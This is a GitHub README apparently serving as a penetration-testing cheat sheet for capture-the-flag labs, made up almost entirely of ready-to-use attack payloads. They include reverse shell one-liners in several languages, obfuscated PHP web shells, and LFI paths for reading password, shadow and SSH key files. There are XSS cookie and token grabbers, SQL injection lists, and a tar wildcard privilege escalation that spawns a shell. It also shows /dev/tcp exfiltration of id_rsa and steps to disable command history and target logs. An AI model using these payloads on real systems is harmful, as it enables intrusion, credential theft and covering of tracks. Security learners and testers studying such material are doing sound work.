Skip to content

saltzer/cheat-sheet

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

52 Commits
HTB
HTB
 
 
VulnHub
VulnHub
 
 
README.md
README.md
 
 

Repository files navigation

Reverse shell

TTY Spawn Shell

PHP Reverse Shell

LFI

XSS

SQL Injection Payloads

Useful Linux command

File Transfer

Traces of stay in the system

Reverse shell > Bash

bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1234 <&1'

Reverse shell > Python

python -c 'import sys,socket,os,pty;s=socket.socket()
  s.connect((os.getenv("127.0.0.1"),int(os.getenv("1234"))))
  [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
  pty.spawn("/bin/sh")'

Reverse shell > Netcat

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 1234 >/tmp/f

Reverse shell > PHP

php -r '$sock=fsockopen(getenv("127.0.0.1"),getenv("1234"));exec("/bin/sh -i <&3 >&3 2>&3");'

Reverse shell > Telnet

TF=$(mktemp -u); mkfifo $TF && telnet 127.0.0.1 1234 0<$TF | /bin/sh 1>$TF

Reverse shell > Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["127.0.0.1"],ENV["1234"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Reverse shell > Perl

perl -e 'use Socket;$i="$ENV{127.0.0.1}";$p=$ENV{1234};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

TTY Spawn Shell > Python spawn shell

python -c 'import pty; pty.spawn("/bin/sh")'

TTY Spawn Shell > OS system spawn shell

echo os.system("/bin/bash")

TTY Spawn Shell > Bash spawn shell

/bin/sh -i

TTY Spawn Shell > Perl spawn shell

perl —e 'exec "/bin/sh";'

TTY Spawn Shell > Ruby spawn shell

ruby: exec "/bin/sh"

TTY Spawn Shell > Lua spawn shell

lua: os.execute("/bin/sh")

TTY Spawn Shell > IRB spawn shell

exec "/bin/sh"

TTY Spawn Shell > VI spawn shell

:!bash

TTY Spawn Shell > VI(2) spawn shell

:set shell=/bin/bash:shell

TTY Spawn Shell > Nmap spawn shell

!sh

PHP Reverse Shell > RCE

<?php system($_GET["cmd"]);?

PHP Reverse Shell > Obfuscate PHP Web Shell

<?=`$_GET[0]`?>
Example: http://site.com/path/to/shell.php?0=command 
<?=`$_POST[0]`?>
Example: curl -X POST http://site.com/path/to/shell.php -d "0=command" 
<?=`{$_REQUEST['_']}`?>
Example: http://site.com/path/to/shell.php?_=command
curl -X POST http://site.com/path/to/shell.php -d "_=command" '
<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
Example: http://site.com/path/to/shell.php?0=command
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>
Example:
http://site.com/path/to/shell.php?_=function&__=argument
http://site.com/path/to/shell.php?_=system&__=ls

PHP Reverse Shell > PHP Reverse Shell (Pentestmonkey)

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

LFI > Directory Traversal

some.php?file=../../../../../../../etc/passwd

LFI > PHP Wrapper php://file

example.php?page=expect://ls

LFI > PHP Wrapper php://filter

example.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

LFI > Useful LFI files (Linux)

/etc/passwd

/etc/shadow

/etc/issue

/etc/group

/etc/hostname

/etc/ssh/ssh_config

/etc/ssh/sshd_config

/root/.ssh/id_rsa

/root/.ssh/authorized_keys

/home/user/.ssh/authorized_keys

/home/user/.ssh/id_rsa

/proc/[0-9]*/fd/[0-9]*

/proc/mounts

/home/$USER/.bash_history

/home/$USER/.ssh/id_rsa

/var/run/secrets/kubernetes.io/serviceaccount

/var/lib/mlocate/mlocate.db

/var/lib/mlocate.db

LFI > Useful LFI files (Apache)

/etc/apache2/apache2.conf

/usr/local/etc/apache2/httpd.conf

/etc/httpd/conf/httpd.conf

Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log

Debian/Ubuntu -> /var/log/apache2/access.log

FreeBSD -> /var/log/httpd-access.log

/var/log/apache/access.log

/var/log/apache/error.log

/var/log/apache2/access.log

/var/log/apache/error.log

LFI > Useful LFI files (MySQL)

/var/lib/mysql/mysql/user.frm

/var/lib/mysql/mysql/user.MYD

/var/lib/mysql/mysql/user.MYI

LFI > Useful LFI files (Windows)

/boot.ini

/autoexec.bat

/windows/system32/drivers/etc/hosts

/windows/repair/SAM

/windows/panther/unattended.xml

/windows/panther/unattend/unattended.xml

/windows/system32/license.rtf

/windows/system32/eula.txt

XSS > Data grabber for XSS

Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>

<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>

<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>

<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>

XSS > Basic Payload

<script>alert('XSS')</script>

<scr<script>ipt>alert('XSS')</scr<script>ipt>

"><script>alert("XSS")</script>

"><script>alert(String.fromCharCode(88,83,83))</script>

XSS > Img tag payload

<img src=x onerror=alert('XSS');>

<img src=x onerror=alert('XSS')//
     
<img src=x onerror=alert(String.fromCharCode(88,83,83));>

<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>

<img src=x:alert(alt) onerror=eval(src) alt=xss>

"><img src=x onerror=alert("XSS");>

"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

XSS > XSS in Markdown

[a](javascript:prompt(document.cookie))

[a](j a v a s c r i p t:prompt(document.cookie))

[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

[a](javascript:window.onerror=alert;throw%201)

XSS > XSS in SVG

<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>

<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
 
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
 
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

XSS > Bypass word blacklist with code evaluation

eval('ale'+'rt(0)');

Function('ale'+'rt(1)')();

new Function`alert`6``;

setTimeout('ale'+'rt(2)');

setInterval('ale'+'rt(10)');

Set.constructor('ale'+'rt(13)')();

Set.constructor`alert(14)```;

SQL Injection Payloads > Generic SQL Injection

' or '

-- or #

' OR '1

' OR 1 -- -

OR "" = "

" OR 1 = 1 -- -"

' OR '' = '

'='

'LIKE'

'=0--+

OR 1=1

' OR 'x'='x

' AND id IS NULL; --

'''''''''''''UNION SELECT '2

SQL Injection Payloads > Time-Based

,(select * from (select(sleep(10)))a)

%2c(select%20*%20from%20(select(sleep(10)))a)

';WAITFOR DELAY '0:0:30'--

SQL Injection Payloads > Generic Error Based Payloads

OR 1=1

OR 1=1#

OR x=y#

OR 1=1--

OR x=x--

OR 3409=3409 AND ('pytW' LIKE 'pytW

HAVING 1=1

HAVING 1=1#

HAVING 1=0--

AND 1=1--

AND 1=1 AND '%'='

WHERE 1=1 AND 1=0--

%' AND 8310=8310 AND '%'='

SQL Injection Payloads > Authentication Based Payloads

' or ''-'

' or '' '

' or ''&'

' or ''^'

' or ''*'

or true--

" or true--

' or true--

") or true--

') or true--

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/

SQL Injection Payloads > Order by and UNION Based Payloads

1' ORDER BY 1--+

1' ORDER BY 2--+

1' ORDER BY 3--+

1' ORDER BY 1,2--+

1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+

1' GROUP BY 1,2,3--+

' GROUP BY columnnames having 1=1 --

-1' UNION SELECT 1,2,3--+

' UNION SELECT sum(columnname ) from tablename --

-1 UNION SELECT 1 INTO @,@

-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

Useful Linux command > SUID Commands

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} ;

find / -type f -name '*.txt' 2>/dev/null

Useful Linux command > System Version

cat /etc/issue

cat /etc/*-release

cat /etc/lsb-release

cat /etc/redhat-release

Useful Linux command > Kernel Version

cat /proc/version

uname -a

uname -mrs

rpm -q kernel

dmesg | grep Linux

ls /boot | grep vmlinuz

Useful Linux command > Environment Variables

cat /etc/profile

cat /etc/bashrc

cat ~/.bash_profile

cat ~/.bashrc

cat ~/.bash_logout

env

set

Useful Linux command > Service Settings

cat /etc/syslog.conf

cat /etc/chttp.conf

cat /etc/lighttpd.conf

cat /etc/cups/cupsd.conf

cat /etc/inetd.conf

cat /etc/apache2/apache2.conf

cat /etc/my.conf

cat /etc/httpd/conf/httpd.conf

cat /opt/lampp/etc/httpd.conf

ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/

Useful Linux command > Cron Jobs

crontab -l

ls -alh /var/spool/cron

ls -al /etc/ | grep cron

ls -al /etc/cron*

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny

cat /etc/crontab

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root

Useful Linux command > Other Users

lsof -i

lsof -i :80

grep 80 /etc/services

netstat -antup

netstat -antpx

netstat -tulpn

chkconfig --list

chkconfig --list | grep 3:on

last

Useful Linux command > Port Forwarding

# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port

ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay

mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe...

backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc

localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

Useful Linux command > TAR Wildcard Cronjob Privilege Escalation

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh

touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"

touch "/var/www/html/--checkpoint=1"

File Transfer > Bash Upload

Upload file over HTTP (require HTTP service running on the attacker machine)
bash -c 'echo -e "POST / HTTP/0.9 $(<id_rsa)" > /dev/tcp/10.10.164.167/1337'
Exfiltrate file over TCP# Listen with Netcat on port 1337 + output redirection
nc -l -p 1337 > data
bash -c 'cat id_rsa > /dev/tcp/10.10.164.167/1337'

File Transfer > Bash Download

Send via netcat
nc -l -p 1337 < id_rsa
Download file on the other machine
bash -c 'cat < /dev/tcp/10.10.164.167/1337 > id_rsa'

File Transfer > Netcat

Upload payload
nc -lnvp 1337
nc 10.10.164.167 1337 < id_rsa
Download
nc 10.10.164.167 1337 < id_rsa
nc -lnvp 1337 > file_saved

File Transfer > Python

Python3 HTTP Server
python3 -m http.server 1337
Python2 HTTP Server
python -m SimpleHTTPServer 1337

File Transfer > SCP

Upload from local host to remote computer
scp id_rsa username@10.10.164.167:~/destination -P 1337
Download from remote computer
scp user@10.10.164.167:~/path_to_file file_saved -P 1337

Traces of stay in the system > Disable Saving Command History

Disable shell variable HISTFILE at login
echo "unset HISTFILE" | sudo tee /etc/profile.d/unset_histfile.sh
If necessary, set the HISTSIZE shell variable to 0 to prevent commands from being stored in history.
echo "HISTSIZE=0" | sudo tee /etc/profile.d/disable_histsize.sh

Traces of stay in the system > Linux Logs

binary files
/var/run/utmp -- current connections to the system
/var/log/wtmp -- history of connections to the system
/var/log/btmp -- failed login attempts
/var/log/lastlog -- users last login
text files
/var/log/auth.log -- user authentication information
/var/log/audit/audit.log -- access denial information
/var/log/messages -- message log
/var/log/security -- user authentication information

Credits

PentestMonkey -- https://github.com/pentestmonkey

GTFODINS -- https://github.com/GTFOBins

HackTools -- https://github.com/LasCC/Hack-Tools

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published